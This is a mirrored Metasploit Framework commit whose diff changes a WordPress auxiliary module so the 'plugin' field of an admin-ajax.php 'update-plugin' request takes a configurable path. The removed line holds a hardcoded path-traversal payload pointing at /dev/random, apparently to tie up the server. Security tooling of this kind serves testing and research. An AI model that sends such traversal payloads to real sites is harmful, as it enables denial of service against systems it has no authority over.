1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-05 14:57:30 +01:00

Final version of configurable depth

This commit is contained in:
root 2017-05-26 16:23:22 +02:00
parent 33ddef9303
commit 9b9d2f2345

View File

@ -147,7 +147,7 @@ class MetasploitModule < Msf::Auxiliary
'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
'vars_post' => {
'action' => 'update-plugin',
'plugin' => '../../../../../../../../../../dev/random'
'plugin' => path
},
'cookie' => cookie
}, timeout = 0.2)